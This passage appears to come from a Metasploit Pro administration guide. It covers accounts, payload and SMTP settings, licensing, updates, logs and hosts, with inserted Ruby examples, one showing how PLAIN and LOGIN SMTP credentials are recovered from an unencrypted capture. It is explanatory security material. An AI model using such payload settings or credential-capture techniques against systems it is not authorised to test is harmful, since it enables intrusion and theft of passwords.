- Services on page 50
- Logs on page 52
- System Updates on page 54

Account Management
A user account provides you and your team members with access to Metasploit Pro. You use a user account to log in to Metasploit Pro and to create identities for other members of the team. A user account consists of a login name, the user's full name, a password, and a role. Use the following components to set up a user account:

- Login name - The user name that the system uses to uniquely identify a person.
- Full name - The first and last name of the person who owns the user account.
- Password - A string of at least eight characters that allows access to the user account (see Account Requirements on page 36 for the full password rules).
- Role - The level of access that the user has to Metasploit Pro and its projects. The role can be administrator or basic user.

Account Types
A user account can be a non-administrator account or an administrator account. The account type determines the privileges that a user has, and therefore which tasks the user can perform. For example, administrators have unrestricted access to the system, so they can perform system updates, manage user accounts, and configure system settings. Non-administrator accounts, on the other hand, have access to Metasploit Pro but can only perform a limited set of tasks.

Administrator Account
An administrator account has unrestricted access to all Metasploit Pro features. With an administrator account, you can do things like remove and add user accounts, update Metasploit Pro, and access all projects.

Non-Administrator Account
A non-administrator account gives a user access to Metasploit Pro, but does not provide them with unlimited control over projects and system settings. This account restricts the user to the projects that they have been granted access to and the projects that they own. A non-administrator account cannot perform the following tasks:

- Create or manage other user accounts.
- Configure global settings for Metasploit Pro.
- Update Metasploit Pro.
- Update the license key.
- View projects that they do not have access to.

Creating a User Account


1. Choose Administration > User Administration from the main menu.

2. When the User Administration page appears, click the New User button.

3. When the New User page appears, fill out the following information to create a user account:

- User name - Enter a user ID for the account.
- Full name - Enter the user's first and last name.
- Password - Use mixed case, punctuation, numbers, and at least eight characters to create a strong password.
- Password confirmation - Re-enter the password.

4. Select the Administrator option if you want to provide the account with administrative rights. If the account has administrative privileges, the user has unrestricted access to all areas of Metasploit Pro. If the account does not have administrative rights, the user can only work with projects that they have access to and cannot update the system.

5. If the account does not have administrative rights, click the Show Advanced Options button to choose the projects that the user can access.


6. Save the changes to the user account.

Changing an Account Password


1. Choose Administration > User Administration from the main menu.

2. Select the user account that you want to modify.

3. Click the Settings button.

4. Find the Change Password area.

5. In the New Password field, enter a password for the account. The password must contain at least eight characters and consist of letters, numbers, and at least one special character.

6. Re-enter the password in the Password Confirmation field.

7. Click the Change Password button.


Resetting the Password for a User Account


If you have forgotten your password or need to reset your password, follow the instructions for your operating system.

Windows

1. From the Start menu, choose All Programs > Metasploit > Password Reset.

2. When the Password Reset window appears, wait for the environment to load.

3. When the dialog prompts you to continue, enter yes. The system resets the password to a random value.

4. Copy the password and use it the next time you log in to Metasploit Pro. You can change the password after you log in to Metasploit Pro.

5. Exit the Password Reset window.

Linux

1. Open the command line terminal and execute the following command: sudo </path/to/metasploit>/diagnostic_shell

2. If prompted, enter your sudo password.

3. When the system returns the bash# prompt, enter </path/to/metasploit>/apps/pro/ui/script/resetpw to run the resetpw script.

4. Copy the password and use it the next time you log in to Metasploit Pro. You can change the password after you log in to Metasploit Pro.

5. Exit the console.

Deleting a User Account


If you have an administrator account, you can delete user accounts that you no longer need. When you delete a user account, the system reassigns the projects that belong to the account to the system. Any project that does not have a project owner will have system listed as the project owner.

1. Choose Administration > User Administration from the main menu.

2. Select the user account that you want to delete.

3. Click Delete.

4. Click OK to confirm that you want to delete the account.

Setting the Time Zone


You can set the time zone that Metasploit Pro uses. The time zone is specific to each user account.

1. Choose Account > User Settings from the main menu.

2. Under Preferences, click the Time zone dropdown. A list of available time zones displays.

3. Choose the time zone that you want to use.

4. Save the changes.

Account Requirements
All accounts must meet the user name and password requirements. If the user name or password does not meet one of the following criteria, Metasploit Pro displays an error until you input a user name and password that complies with every requirement.

User Name Requirements


A user name can contain any combination of the following characters:

- Alphanumeric characters
- Spaces
- Non-alphanumeric characters (!@#$%^&*()+,.?/<>)

Password Requirements
A password must meet the following criteria:

- Contains letters, numbers, and at least one special character.
- Contains at least eight characters.
- Does not contain the user name.
- Is not a common password.
- Does not use a predictable sequence of characters.

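The following Ruby script is an added example, not code from this guide or from Metasploit Pro itself, that encodes the user name and password rules above so you can vet credentials before you create accounts for a team. The small common-password list, the four-character run used to flag a "predictable sequence", and the case-insensitive user-name match are assumptions made here for illustration; the product's own checker and word list are not shown on this page.

```ruby
# Added example: checks a user name and password against the Account
# Requirements listed above. The word list, the run length used to flag
# predictable sequences, and case-insensitive matching are assumptions;
# this is not Metasploit Pro's own implementation.
require 'set'

# Allowed user-name characters: alphanumerics, spaces, and !@#$%^&*()+,.?/<>
USERNAME_ALLOWED = %r{\A[A-Za-z0-9 !@\#\$%\^&\*\(\)\+,\.\?/<>]+\z}

# Assumed stand-in for a real common-password list.
COMMON_PASSWORDS = Set.new(
  %w[password password1 12345678 qwerty123 letmein1 welcome1 admin123 metasploit]
).freeze

SEQUENCE_RUN = 4 # assumed: "abcd" or "4321" anywhere in the password is predictable

def username_errors(name)
  errs = []
  name = name.to_s
  errs << 'user name is empty' if name.empty?
  unless name.empty? || name.match?(USERNAME_ALLOWED)
    errs << 'user name contains characters outside the allowed set'
  end
  errs
end

# True when any SEQUENCE_RUN consecutive characters step by exactly +1 or -1
# in code-point order (abcd, 1234, dcba, ...), ignoring case.
def predictable_sequence?(pw, run = SEQUENCE_RUN)
  codes = pw.downcase.codepoints
  return false if codes.length < run
  codes.each_cons(run).any? do |window|
    steps = window.each_cons(2).map { |a, b| b - a }
    steps.uniq.length == 1 && [1, -1].include?(steps.first)
  end
end

def password_errors(pw, username)
  errs = []
  errs << 'must contain at least eight characters' if pw.length < 8
  errs << 'must contain a letter' unless pw.match?(/[A-Za-z]/)
  errs << 'must contain a number' unless pw.match?(/[0-9]/)
  errs << 'must contain a special character' unless pw.match?(/[^A-Za-z0-9]/)
  if !username.to_s.empty? && pw.downcase.include?(username.to_s.downcase)
    errs << 'must not contain the user name'
  end
  errs << 'is a common password' if COMMON_PASSWORDS.include?(pw.downcase)
  errs << 'uses a predictable sequence of characters' if predictable_sequence?(pw)
  errs
end

# Convenience wrapper: true only when both fields pass every rule.
def account_valid?(username, pw)
  username_errors(username).empty? && password_errors(pw, username).empty?
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample accounts: one good, three that break different rules.
  [['alice', 'Tr0ub4dor&3'], ['alice', 'alice123!'],
   ['bob', 'abcd1234!!'], ['a;b', 'Good#Pass9x']].each do |u, p|
    problems = username_errors(u) + password_errors(p, u)
    puts "#{u.inspect} / #{p.inspect}: #{problems.empty? ? 'OK' : problems.join('; ')}"
  end
end
```

Run it with `ruby account_rules.rb`; each line reports either OK or the list of rules the pair fails. Because Metasploit Pro rejects the account until every rule passes, checking a batch of planned credentials this way is quicker than discovering the failures one at a time in the New User form.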

System Management
As an administrator, you have to update and maintain Metasploit Pro to ensure that you have the latest bug fixes, features, and modules. There are a couple of ways to determine when an update is available. You can view the Product News panel to learn when the Metasploit team has released an update, or you can set up an alert that appears when an update is available to install. Additionally, as an administrator, you can configure the global settings that apply to all projects. The global settings include payload settings, mail server settings, API keys, listeners, Nexpose consoles, and Metasploit services.

Global Settings
Global settings define settings that all projects use. You can access global settings from the Administration menu. From the global settings, you can set the payload type for the modules and enable access to the diagnostic console through a web browser. Additionally, from global settings, you can create API keys, post-exploitation macros, persistent listeners, and Nexpose Consoles.

Setting HTTP Payloads


If you want Metasploit Pro to communicate over TCP without encryption, you can set it to use HTTP payloads. HTTP payloads are useful for client-side attacks or social engineering campaigns. They are the most reliable way to communicate with a target machine, but they do not provide any level of stealth. For example, if a victim is behind a proxy and has to use the proxy to connect back to the attacking machine, you should enable the HTTP payload option. This ensures that Metasploit can create a connection between the attacker and the victim.

1. Choose Administration > Global Settings from the main menu.

2. Select payload_prefer_http from the Global Settings.


3. Update the settings.

Setting HTTPS Payloads


By default, Metasploit communicates over a standard TCP connection with SSL. HTTPS payloads provide you with some level of stealth, but the payloads may not be as reliable as HTTP payloads. This configuration generally works well in most cases, but if the target is behind a proxy, the proxy may not be able to handle the SSL connection properly. If you know that the target is behind a proxy, you should not use HTTPS payloads; use HTTP payloads instead. If you want Metasploit Pro to always try to encrypt the HTTP connection, set it to use HTTPS-based payloads.

1. Choose Administration > Global Settings from the main menu.

2. Choose payload_prefer_https from the Global Settings.

3. Update the settings.


Enabling Automatic Updates


If you want an alert to appear when an update is available, you must enable the automatic update option. When an update is available for you to download, a small notification icon will appear in the Main menu bar. By default, this option is enabled.

1. Choose Administration > Global Settings from the main menu.

2. Choose automatically_check_updates from the Global Settings.

3. Update the settings.

Disabling Automatic Updates


If you do not want an alert to appear when an update is available, you must disable the automatic update option.

1. Choose Administration > Global Settings from the main menu.

2. Deselect automatically_check_updates from the Global Settings.


3. Update the settings.

Automatically Enabling an HTTP Proxy for Updates


1. Choose Administration > Global Settings from the Main menu.

2. Choose use_http_proxy from the Global Settings.

3. Update the settings. The settings that you define automatically fill the HTTP proxy server settings when you perform an update.

Defining SMTP Settings for a Mail Server


To send e-mail from Metasploit Pro, you must configure the SMTP settings for the mail server that you want to use. The tasks that utilize the SMTP settings are social engineering and reporting. For example, if you want to e-mail a report after you generate a report, you need to configure the SMTP settings. The sender for reports is reports@pro.metasploit.com. You may want to add this e-mail address to the safe sender list to ensure that these e-mails are not moved to the Junk Mail folder.


In order to utilize e-mail capabilities, you must have access to a local mail server or a web mail server. You need the address and port that the mail server runs on, the domain name that hosts the mail service, and the credentials for the mail server.

1. Choose Administration > Global Settings from the main menu.

2. Under SMTP Settings, define the following fields:

- Address - The address of the remote mail server. For example, use 127.0.0.1 or localhost if the mail server runs on your local machine.
- Port - The port that the mail server uses. The default port is 25.
- Domain - The fully qualified domain name that hosts the mail server. For example, use sitename.com.
- User Name - The user name that the system uses to authenticate to the mail server.
- Password - The password that the system uses to authenticate to the mail server.
- Authentication - The authentication type that the mail server uses. Choose from plain, login, and cram_md5. Note that plain and login transmit the password base64-encoded rather than encrypted, so use them only when the connection to the mail server is protected by TLS; cram_md5 sends an HMAC of the password instead of the password itself.

3. Click the Update button.
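The three authentication types you can pick from are not equivalent from a credential-exposure standpoint. The Ruby script below is an added example, not part of this guide or of Metasploit Pro, that builds the exact client lines each mechanism sends on the SMTP session and then shows what someone capturing a non-TLS session could recover. The user name, password and server challenge are the published RFC 2195 test values, not credentials from this guide; the base64 and HMAC helpers use only core Ruby and OpenSSL.

```ruby
# Added example: what each SMTP AUTH mechanism offered in the SMTP Settings
# (plain, login, cram_md5) puts on the wire, and what a passive observer of an
# unencrypted session learns from it. Test values are the RFC 2195 sample
# (user "tim", secret "tanstaaftanstaaf"), not anything from Metasploit Pro.
require 'openssl'

# Strict base64 (no line breaks) via Array#pack / String#unpack1.
def b64(str)
  [str].pack('m0')
end

def unb64(str)
  str.unpack1('m0')
end

# AUTH PLAIN (RFC 4616): a single line "\0user\0password", base64-encoded.
def auth_plain_lines(user, pass)
  [b64("\0#{user}\0#{pass}")]
end

# AUTH LOGIN: the client answers two server prompts, user name then password,
# each base64-encoded on its own line.
def auth_login_lines(user, pass)
  [b64(user), b64(pass)]
end

# AUTH CRAM-MD5 (RFC 2195): the server sends a base64 challenge; the client
# replies with base64("user " + hex(HMAC-MD5(password, challenge))). The
# password itself never leaves the client.
def auth_cram_md5_lines(user, pass, challenge_b64)
  challenge = unb64(challenge_b64)
  digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('MD5'), pass, challenge)
  [b64("#{user} #{digest}")]
end

def client_lines(mechanism, user, pass, challenge_b64 = nil)
  case mechanism
  when :plain    then auth_plain_lines(user, pass)
  when :login    then auth_login_lines(user, pass)
  when :cram_md5 then auth_cram_md5_lines(user, pass, challenge_b64)
  else raise ArgumentError, "unknown mechanism #{mechanism.inspect}"
  end
end

# Plays the role of someone who captured the unencrypted session: returns the
# password if the mechanism exposes it, nil if only a keyed digest was sent.
def password_from_capture(mechanism, lines)
  case mechanism
  when :plain    then unb64(lines[0]).split("\0")[2]
  when :login    then unb64(lines[1])
  when :cram_md5 then nil
  end
end

if __FILE__ == $PROGRAM_NAME
  user, pass = 'tim', 'tanstaaftanstaaf'                         # RFC 2195 sample
  challenge = b64('<1896.697170952@postoffice.reston.mci.net>')  # RFC 2195 sample
  %i[plain login cram_md5].each do |mech|
    lines  = client_lines(mech, user, pass, challenge)
    leaked = password_from_capture(mech, lines)
    puts "#{mech}: client sends #{lines.inspect}; password recoverable: #{leaked.inspect}"
  end
end
```

Run it with `ruby smtp_auth.rb`. For plain and login the "recoverable" value is the password itself, which is why those two should only be configured against a mail server reached over TLS; for cram_md5 the capture yields only an HMAC bound to a one-time challenge, though the server must hold the password in a reversible form to verify it, and MD5-based HMAC is a legacy mechanism that many mail servers no longer offer.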


Removing Metasploit
When you uninstall Metasploit Pro, you remove the Metasploit components and modules from the system and delete the data stored within the projects. After you remove Metasploit Pro, you will no longer be able to access or view any information that the projects contain. Therefore, before you remove Metasploit Pro and its components, export any data that you want to keep, such as reports and host data.

Removing Metasploit from Windows Systems


1. Navigate to Start > All Programs > Metasploit.

2. Click Uninstall Metasploit.

3. Click Yes to confirm that you want to delete all saved project data.

4. Click OK when the process completes.

Removing Metasploit from Linux Systems


1. Open the command line terminal.

2. Use the cd command to change the directory path to the Metasploit directory. If you installed Metasploit in the default directory, type the following: $ cd /opt/metasploit-4.4.0

Note: Replace the version number with your version number.

3. Type the following to stop all Metasploit services and press Enter: $ ./ctlscript.sh stop

4. Type the following to uninstall Metasploit and all its components: $ ./uninstall


5. Click Yes to confirm that you want to uninstall Metasploit Pro components and modules.

6. Click Yes to confirm that you want to delete the data saved in the projects. If you click No, the $INSTALLER_ROOT/apps directory remains intact, and you can continue to access the Metasploit data stored in this directory.


License Keys
A license key defines the commercial edition and the registered owner of Metasploit Pro. Metasploit Pro uses the license key to identify the number of days that remain on the license and the number of users that the license key allows. Metasploit licenses are perpetual licenses, which enable you to use the application indefinitely. However, the license itself expires every year. When the license expires, you must renew the license if you want to continue to receive updates for Metasploit. You can still run Metasploit, but you can only run the last version that was released before your license key expired. To access the license key area, select Administration > Software License from the main menu.

Getting a License Key


If you purchased Metasploit Pro and have not received your license key from Rapid7, you can e-mail the sales team at sales@rapid7.com. Otherwise, you can select Administration > Software License from the main menu, and click the Get Product Key button.

When the license key request page appears, choose whether you want to trial Metasploit Pro or obtain a Metasploit Community license key.


Activating a License Key for the First Time


1. Open a browser and go to https://localhost:3790 if you installed Metasploit Pro on your local system or enter https://<IP address>:3790 if you installed Metasploit Pro on a remote machine.

Note: 3790 is the default port that the Metasploit service uses. If you assigned the Metasploit service to a different port during the installation process, use that port instead.


2. If you receive a warning about the trustworthiness of the security certificate, select that you understand the risks and want to continue to the website. The wording that the warning displays depends on the browser that you use.

3. When the web interface for Metasploit Pro appears, the New User Setup page displays if this is a first time activation. Follow the onscreen instructions to create a user account for Metasploit Pro. Save the user account information so that you can use it later to log in to Metasploit Pro.

4. After you create a user account, the Activate Metasploit page appears. Enter the license key that you received from Rapid7 in the Product Key field.

Note: If you need to use an HTTP proxy to reach the Internet, you can select the HTTP proxy option and provide the information for the HTTP proxy server that you want to use.

5. Click the Activate License button. After you activate the license key, the Projects page appears.

Updating a License Key


If the license key for Metasploit Pro expires or if you need to enter a product key for a different Metasploit product, you can change the license key that the system currently uses.

1. Choose Administration > Software License from the main menu.


2. Enter the license key in the Product Key field.

3. Activate the license.

Performing an Offline Activation


If you do not have network access, use the offline activation file to activate Metasploit Pro. To obtain an offline activation file, contact our sales team at sales@rapid7.com.

1. Choose Administration > Software License from the main menu.

2. Click the Offline Activation link.


3. When the Offline Activation window appears, browse to the location of the activation file.

4. Select the activation file.

5. Click Activate Product to complete the activation.

Reverting to the Previous License Key


You can revert to the previous license key if Metasploit Pro detects that a previous license key exists on the system. Use license key reversion to switch between different versions of Metasploit products. For example, if you install a trial version of a Metasploit product, use license key reversion to switch back to the full version.

1. Choose Administration > Software License from the main menu.

2. If the system detects that there is a previous license key, you will see the Revert to Previous License area. Click Revert License. The License Details window appears after the system successfully reverts to the previous license key.


Services
If you attempt to launch Metasploit Pro and you receive the "Metasploit is initializing" message, you may need to restart the Metasploit services. This error typically occurs after you install or update Metasploit Pro. If you have recently installed Metasploit Pro, you may need to wait a few minutes for it to load after the installation completes. If it has been more than fifteen minutes since the installation finished, you should restart the Metasploit services. If you recently updated Metasploit Pro, the services were automatically restarted after the update completed. You should wait a few minutes to see if the Metasploit services start up again. If they do not, you should manually restart the services.

Restarting Metasploit Services on Windows


To restart the Metasploit services on Windows systems, you must stop the Metasploit services before you can start them again. When you stop and start the Metasploit services, a few command line windows appear. These prompts run a control script that stops and starts all Metasploit services, which include PostgreSQL, thin, and prosvc. This is a two-step process.

1. Choose Start > Programs > Metasploit > Services > Stop Services.

Note: If the system prompts you to allow the program to make changes to the computer, click Yes.

2. Choose Start > Programs > Metasploit > Services > Start Services.

Restarting Metasploit Services on Linux


1. Open the command line terminal.

2. Use the cd command to change the directory path to the Metasploit directory location. If you installed Metasploit in the default directory, type the following: $ cd /opt/metasploit-4.4.0

Note: Replace the version number with your Metasploit version.

3. Enter the following and press Enter: $ sudo bash ctlscript.sh restart


4. Enter your sudo password when the system prompts you for it. After you enter the sudo password, the system stops and restarts all services associated with Metasploit. This includes prosvc, thin, and PostgreSQL. After the system restarts the services, wait a few minutes before you access the Metasploit Web Interface.


Logs
Metasploit Pro stores system events in log files. You can use the information in the log files to troubleshoot issues with Metasploit Pro. For example, if you need to troubleshoot an issue with updates, you can view the license log to see a list of events related to product activation, license keys, and updates. Please note that log files can become large over time. To reduce the amount of disk space the log files consume, regularly review and clear log files. Use the following log files to troubleshoot issues with Metasploit Pro:

- Framework log - Details information about loading the Metasploit Framework. Use this log to troubleshoot issues with modules.
- License log - Details product licensing and product updates. Use this log to troubleshoot problems that you may have with applying a license key or installing an update.
- PostgreSQL log - Details the start up and shutdown notices. Use this log to troubleshoot SQL query bugs and to understand the current state of the database.
- Production log - Details all Rails actions, such as the refresh data and routing errors. Use this log to troubleshoot Rails issues and to trace the actions that were taken for a particular connection.
- Pro service error log - Details errors for the Metasploit Pro service engine. Use this log to troubleshoot errors with the Metasploit service.
- Thin log - Details the location of the PID file. Use this log to diagnose issues between Rails and Nginx.
- Web server error log - Details Nginx errors. Use this log to determine if an issue is related to Nginx rather than Rails or Pro Service.
- Web server access log - Details every GET and POST request to Nginx and logs successful HTTP requests. Use this log to track down Rails issues.

Log File Locations


You can access the log files in the following directories:

- Framework log - $INSTALL_ROOT/apps/pro/engine/config/logs/framework.log
- License log - $INSTALL_ROOT/apps/pro/engine/license.log
- Production log - $INSTALL_ROOT/apps/pro/ui/log/production.log
- Pro service log - $INSTALL_ROOT/apps/pro/engine/prosvc.log
- Tasks log - $INSTALL_ROOT/apps/pro/engine/tasks
- Thin log - $INSTALL_ROOT/apps/pro/ui/log/thin.log
- Web server error log - $INSTALL_ROOT/apache2/logs/error_log
- Web server access log - $INSTALL_ROOT/apache2/logs/access_log


System Updates
In order to keep your copy of Metasploit Pro up to date with the latest fixes, enhancements, and modules, you need to install system updates when they are available. When there is a new update available, Metasploit Pro flashes a real-time alert in the Main menu. The Metasploit team typically releases weekly updates, so you need to update Metasploit Pro regularly to get the latest code base. Note: If you do not see update alerts, you will need to change the system settings to allow the alerts to display.


Notification Center
Notification Center is the notification system for Metasploit Pro that alerts you when a task completes or when a software update is available. It displays as a dropdown banner from the Global Menu and provides a unified view of system-wide alerts for all projects. The Notification Center icon displays the total number of new alerts that are available. All new notifications are highlighted with a green bar. You can click on a notification to access the associated page in the user interface. Most task and MetaModule notifications will take you to the Task log. All system notifications will take you to the Software Updates page.

Accessing Notification Center
To access Notification Center, click on the notification icon in the upper-right hand corner of the Global Menu.

Notification Events
Notification Center displays alerts when the following events occur:

- A MetaModule run completes.
- A task run, such as a Discovery Scan or Bruteforce Attack, completes.
- A software update is available.

Sorting Notifications by Event Type


1. From the Global Menu, click the Notification Center icon.


2. Click the Show dropdown button and choose the event type you want to use to sort the notifications. You can choose from MetaModules, Tasks, and System.

3. After you choose an event type, Notification Center updates the alerts.

Clearing a Notification
1. From the Global Menu, click the Notification Center icon.

2. Find the alert that you want to remove.


3. Hover your mouse over the alert. A delete button appears.

4. Click the 'X' button to remove the alert.

Updating the System


The Metasploit team releases weekly updates that include bug fixes, new modules, and feature enhancements. If you have administrator privileges, you should regularly check for software updates and apply the updates to the system. This ensures that you have the latest code from the Metasploit Framework and access to the newest modules and features. The installer for Metasploit Pro does not contain the latest updates to the code base. You must manually apply updates to the system to keep Metasploit Pro current. For example, if you recently installed Metasploit 4.4, you have the code base that was originally released. You do not have the modules or fixes that have been provided in subsequent updates. Therefore, you need to check to see if there is an update available and apply the update to the system.

Updating the System After Installation


If you recently installed Metasploit Pro, you should immediately check to see if an update is available. The Metasploit installer does not include the latest software updates for the Metasploit Framework. So, if you do not update Metasploit Pro after you install, you may not have the most current code from the Metasploit Framework.

1. Click Administration > Software Updates from the main menu.


2. When the Software Updates window appears, select the Use an HTTP Proxy to reach the internet option if you want to use an HTTP proxy server to check for updates. If you select this option, the proxy settings appear. Configure the settings for the HTTP proxy that you want to use.

3. Click the Check for updates button. If an update is available, the system shows you the latest version number and provides an install button for you to use to update the system.

4. Install the update.

Updating Metasploit Offline


Rapid7 provides offline update files that you can use to safely update Metasploit Pro and Metasploit Express without an Internet connection. For each major release, Rapid7 e-mails you the links and instructions that you need to update Metasploit. The links point you to bin files that you can download and save to a portable storage device or shared network location so that you can easily transfer the file to your Metasploit server. In order to update Metasploit to the latest version, you must install each incremental release between your current version and the latest version. For example, if your current version of Metasploit is 4.5.2, you need to apply the 4.5.3 update before you can apply the 4.6 update. If you do not apply the updates sequentially, product dependencies may not be upgraded correctly and can cause issues with Metasploit.

To apply an offline update:


1. Launch and log in to Metasploit.

2. Locate the footer at the bottom of the user interface.


3. Identify the current release version of Metasploit that you have installed.

Note: You will see the product edition, the release version, and the update version. For example, in Metasploit Pro 4.6.0 - update 2013050101, the release version is 4.6.0.

4. From the e-mail that you have received from Rapid7, find and download the offline update files that you need.

5. From within Metasploit, select Administration > Software Updates from the Global menu.

6. Find the Product Updates area.


7. Click the Offline Update File link.

8. Browse to the location of the offline update file and select it.

The offline update file is the bin file that you downloaded from the Rapid7 e-mail.

10. Click the Install Update button.

Metasploit installs the update and restarts the Metasploit service when the update is done. Please wait a few minutes for the service to restart. If there are additional updates that you need to install, you must repeat this process until you have the latest version of Metasploit.
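The sequencing rule above (apply every incremental release, oldest first) is easy to get wrong when versions are compared as strings. The following Ruby example is added here and is not Metasploit's own code: it parses the footer string from step 3 in the format the guide shows, orders the versions of the offline update files you received, and reports any release that exists between the installed one and the newest one but is missing from the plan. The file name pattern metasploit-<version>.bin and the list of known releases are assumptions supplied by the operator; the real names and links come from the Rapid7 e-mail.

```ruby
# Added example (not Metasploit's own code): parse the version footer the guide
# describes and plan the order in which offline update files must be applied.

FOOTER_RE = /\A(?<edition>Metasploit \w+) (?<release>\d+(?:\.\d+)*) - update (?<stamp>\d+)\z/

# Parses the footer text, e.g. "Metasploit Pro 4.6.0 - update 2013050101"
# (format as shown in the guide), into edition, release and update stamp.
def parse_footer(text)
  m = FOOTER_RE.match(text.strip)
  raise ArgumentError, "unrecognized footer: #{text.inspect}" unless m
  { edition: m[:edition], release: m[:release], update: m[:stamp] }
end

# Numeric, zero-padded key so that "4.10.0" sorts after "4.9.0" (a plain
# string comparison gets this wrong) and "4.6" equals "4.6.0".
def version_key(version)
  k = version.split('.').map(&:to_i)
  k + [0] * [3 - k.size, 0].max
end

# Orders the update files to apply: everything newer than the installed
# release, oldest first. Assumption: the hypothetical file name pattern
# "metasploit-<version>.bin"; the real names come from Rapid7's e-mail.
def plan_offline_updates(installed, available_versions)
  cur = version_key(installed)
  available_versions
    .select { |v| (version_key(v) <=> cur) == 1 }
    .sort_by { |v| version_key(v) }
    .map { |v| { version: v, file: "metasploit-#{v}.bin" } }
end

# Releases that exist between the installed release and the newest planned one
# but are absent from the plan. A non-empty result means the plan would skip an
# incremental release, which the guide says must not happen. The known release
# list is supplied by the operator (an assumption; it is not read from anywhere).
def missing_releases(installed, plan, known_releases)
  cur = version_key(installed)
  planned = plan.map { |p| version_key(p[:version]) }
  latest = planned.sort.last
  return [] if latest.nil?
  known_releases.select do |r|
    k = version_key(r)
    (k <=> cur) == 1 && (k <=> latest) <= 0 && !planned.include?(k)
  end
end

if __FILE__ == $PROGRAM_NAME
  footer = parse_footer('Metasploit Pro 4.6.0 - update 2013050101')
  plan = plan_offline_updates(footer[:release], %w[4.6.1 4.7.0 4.8.0 4.9.0])
  plan.each { |p| puts "apply #{p[:file]}" }
  gaps = missing_releases(footer[:release], plan, %w[4.6.0 4.6.1 4.7.0 4.8.0 4.9.0])
  puts(gaps.empty? ? 'no skipped releases' : "skipped: #{gaps.join(', ')}")
end
```

Run the plan check before you start installing: if `missing_releases` returns anything, obtain that release's update file first rather than applying the newer file and hoping the dependencies sort themselves out.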


Applying the Weekly Update


If you are an administrator, you should regularly check for available updates to Metasploit Pro. From the Web UI, Metasploit Pro alerts you when a newer version is available for you to install. If a newer version of Metasploit Pro is not available, the system notifies you that you have the latest version.

1. Click Administration > Software Updates from the main menu.

2. When the Software Updates window appears, select Use an HTTP Proxy to reach the Internet if you want to use an HTTP proxy server to check for updates. If you select this option, the proxy settings appear. Configure the settings for the HTTP proxy that you want to use.

3. Click the Check for updates button.

4. If an update is available, the system shows you the latest version number and provides an install button for you to use to update the system.

5. Install the update. After the update completes, Metasploit Pro prompts you to restart the back end services. If you restart the services, Metasploit Pro terminates active sessions and requires up to ten minutes to restart.

Deleting the Browser Cache After an Update


After you update Metasploit Pro, you must delete your browser's cache so that the user interface renders correctly. If you do not delete your browser's cache, some items may not display or may appear distorted. To learn how to delete your browser's cache, read the documentation for your specific browser or visit this handy website.


Chapter 4: Host Management

In Metasploit Pro, a host refers to a device on a network and is represented by its IP address or server name. Hosts are typically fingerprinted, enumerated, and added to a project during a Discovery Scan, data import, or Nexpose Scan. To view the hosts in a project, you need to go to the Analysis area. All hosts stored in the project will be viewable, searchable, and editable from the Analysis area of the user interface. To learn more about host management, read the following topics:

- Host Management Interfaces on page 63
- Viewing and Editing Host Metadata on page 65
- Adding, Editing, and Deleting Services on page 71
- Adding, Editing, and Deleting Vulnerabilities on page 75
- Host Management on page 62
- Adding, Editing, Downloading, and Deleting Captured Data on page 91


Host Management Interfaces


Metasploit Pro offers a couple of different host views. Host views provide visibility into the data that a project contains. Each view provides a different way in which you can view the metadata and findings for hosts within a project. The following host views are available:
- Project view - Provides a high-level view of all the hosts and data that are stored in the project. To access the project view, click on the Analysis tab. The project view initially shows the Hosts list, which displays the fingerprint and enumerated ports and services for each host. In addition to the Hosts list, you can view the notes, services, vulnerabilities, and captured data from the project view. To access these other views, you can click on their tabs from the project view.
- Single host view - Displays the details for a specific host, such as the services, sessions, vulnerabilities, credentials, captured data, notes, file shares, tags, exploit attempts, available modules, and source. To access the single host view, click on a host IP address.

Tour of the Analysis Area


The Analysis area shows the test findings on a project level. The Analysis area shows you all of the information that has been gathered and tracked for a particular project. For example, you will want to go to the Analysis area if you want to see a list of hosts that were discovered or imported, view the captured data stored in the project, or create Nexpose vulnerability exceptions. From the Analysis area, you can navigate to the following main pages:
- Hosts page - Lists all the hosts in a project and shows their operating system, purpose, tags, and counts for services and vulnerabilities.
- Notes page - Lists the notes, or additional bits of information, that Metasploit Pro was able to collect from a host during a scan.
- Services page - Lists the services that were enumerated and shows their port number, port state, and the host that each one is running on.
- Vulnerabilities page - Lists the vulnerabilities that have been imported from a vulnerability scanner or that have been found by Metasploit Pro. You can create vulnerability exceptions and push validated vulnerabilities back to Nexpose from the Vulnerabilities page.
- Captured Data page - Lists all the loot and evidence that was collected from all hosts in the project. You can view or download captured data files from this page.
- Network Topology - Shows a diagram of the physical layout of a target network.


Tour of the Single Host Page


The single host page shows the findings on a per host level. Use this view to drill down to the details for a particular host. For example, you will want to view the single host when you want to view the credentials, services lists, or open/closed sessions for a host. To access the single host page, click on the IP address for any host.


Viewing and Editing Host Metadata


Each host has metadata that helps you identify its network details and its operating system. You can view the host metadata to learn more about the identifiable attributes for a particular host or you can edit the host metadata if there are additional details you want to provide about the host.

Viewing Host Metadata

To view metadata for a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host you want to view the host information for.

3. Click on the Edit icon. The Host Information window displays the metadata for the host.


Editing Host Information

To edit the metadata for a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that you want to edit.

3. Click on the Edit icon. The Host Information window displays the metadata for the host.

4. Click on the Edit icon for the metadata field you want to add or modify. The field becomes editable.

Note: The following metadata fields can be edited: host address, host name, host MAC address, OS name, OS flavor, OS service pack, and OS purpose.


5. Enter the information you want to use in the field. For example, if you know the service pack, you can add it to the SP field.

6. Click the Save link when you are done.

7. Click the Done button to close the Host Information window.


Adding and Deleting Hosts


There are a few ways that hosts can be automatically added to a project: through a Discovery Scan, Nexpose Scan, or import. When you run a scan or import, Metasploit Pro gathers host information and stores it in the project database. If there are specific hosts that you want to add, without running a scan or import, you can manually add them to a project. Or if there are hosts that you scanned or imported that you do not want to include in the project, you can simply delete them.

Adding a Host to a Project

To add a host to a project:


1. Select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click the New Host button from the Quick Tasks bar. The New Host form appears.

3. Fill out the Name and Address section with the host's network details. At a minimum, you will need to specify the host name and host IP address.

4. Fill out the Operating System section, if you know the OS that runs on the host. If you do not have this information, you can skip this step.

Note: You can additionally specify the OS version, OS flavor, and Purpose. These fields are optional.


5. Select the Lock edited host attributes option if you do not want the host metadata to be editable. If you select this option, team members and subsequent scans/imports will not be able to modify the host metadata.

6. Click on the Add Service link, if you know there is a specific service running on the host that you want to add. You can add as many services as you need.

7. Click the Save button when you are done.


Deleting a Host from a Project

To delete a host from a project:


